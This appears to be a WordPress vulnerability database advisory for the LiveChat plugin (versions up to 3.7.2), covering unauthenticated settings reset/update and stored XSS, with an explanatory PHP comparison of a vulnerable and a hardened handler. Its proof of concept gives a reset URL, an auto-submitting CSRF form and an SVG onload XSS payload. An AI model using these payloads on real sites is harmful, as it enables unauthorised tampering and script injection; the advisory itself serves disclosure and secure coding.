LiveChat <= 3.7.2 - Unauthenticated Option Update/Reset and Stored XSS



Description
The lack of proper CSRF and Authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when updating the livechat_email option, no sanitisation is performed, leading to a Stored XSS issue in the plugin's settings page.

The CSRF and XSS issues were fixed in 3.7.3; however, the authorisation fix only added an is_admin() check, which merely checks whether the dashboard or admin panel is being displayed (it is also true for admin-ajax.php requests) and says nothing about the caller's privileges. Fixed in 3.7.6.
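To show why is_admin() is not an authorisation check and what a correct handler looks like, here is an added illustration written for this page. It is not the plugin's own code: the handler shape, the hook used and every function name other than the livechat_email option are assumptions, chosen to match the advisory (an admin-ajax.php request with no action parameter, a Referer containing livechat_settings, and an unsanitised licenseEmail value). The hardened version adds the checks a WordPress settings handler needs: capability, nonce, input sanitisation and output escaping.

```php
<?php
// Added illustration, not the plugin's code. Names prefixed "hypothetical_" are assumptions.

// BEFORE (vulnerable shape described in the advisory).
// admin_init also fires for admin-ajax.php requests, which unauthenticated
// visitors can reach, and is_admin() is true there because admin-ajax.php
// lives under /wp-admin/. So this "check" proves nothing about the caller,
// there is no nonce, and the e-mail value is stored exactly as submitted.
function hypothetical_livechat_save_settings_vulnerable() {
    if ( ! is_admin() ) {
        return;
    }
    if ( isset( $_GET['reset'] ) && isset( $_GET['page'] ) && 'livechat_settings' === $_GET['page'] ) {
        delete_option( 'livechat_email' );
    }
    if ( isset( $_POST['licenseEmail'] ) ) {
        update_option( 'livechat_email', $_POST['licenseEmail'] );
    }
}
add_action( 'admin_init', 'hypothetical_livechat_save_settings_vulnerable' );

// AFTER (hardened). Registered only on the authenticated wp_ajax_ hook;
// there is deliberately no wp_ajax_nopriv_ registration.
function hypothetical_livechat_save_settings_hardened() {
    // 1. Authorisation: the caller must actually be allowed to manage options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. CSRF: the request must carry a nonce issued to this user for this action.
    check_ajax_referer( 'livechat_settings_nonce', '_wpnonce' );

    // 3. Input validation: accept only a syntactically valid e-mail address.
    if ( isset( $_POST['licenseEmail'] ) ) {
        $email = sanitize_email( wp_unslash( $_POST['licenseEmail'] ) );
        if ( ! is_email( $email ) ) {
            wp_send_json_error( 'invalid email', 400 );
        }
        update_option( 'livechat_email', $email );
    }
    if ( ! empty( $_POST['reset'] ) ) {
        delete_option( 'livechat_email' );
    }
    wp_send_json_success();
}
add_action( 'wp_ajax_livechat_save', 'hypothetical_livechat_save_settings_hardened' );

// 4. Output escaping on the settings page, so whatever was stored can never
//    be rendered as markup. The nonce field feeds check 2 above.
function hypothetical_livechat_render_email_field() {
    printf(
        '<input type="hidden" name="_wpnonce" value="%s"/>' .
        '<input type="email" name="licenseEmail" value="%s"/>',
        esc_attr( wp_create_nonce( 'livechat_settings_nonce' ) ),
        esc_attr( get_option( 'livechat_email', '' ) )
    );
}
```

The point of the two versions side by side: is_admin() answers "is an admin-area file being served?", while current_user_can() answers "may this user do this?", and only the second is an authorisation decision. The nonce closes the cross-site request path, sanitize_email()/is_email() reject the payload at storage time, and esc_attr() on output means a bad value that somehow got stored still cannot execute.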
Proof of Concept
Unauthenticated Option Reset:
https://<BLOG>/wp-admin/admin-ajax.php?reset=1&page=livechat_settings

Unauthenticated Option Update (make sure the Referer of the request contains livechat_settings, for example "Referer: livechat_settings"):

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="licenseNumber" value="42"/>
      <input type="hidden" name="licenseEmail" value="whatever"/>
    </form>
  </body>
</html>

Unauthenticated Stored XSS:
Like the PoC above, but replace the licenseEmail value with "><svg/onload=alert(/XSS/)>

Affects Plugin

fixed in version 3.7.6

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2113080%40wp-live-chat-software-for-wordpress&old=2103185%40wp-live-chat-software-for-wordpress

Classification

Type MULTI

Miscellaneous

Views 2283
Verified No
WPVDB ID 9441

Timeline

Publicly Published 2019-06-26 (4 months ago)
Added 2019-07-09 (3 months ago)
Last Updated 2019-08-14 (2 months ago)
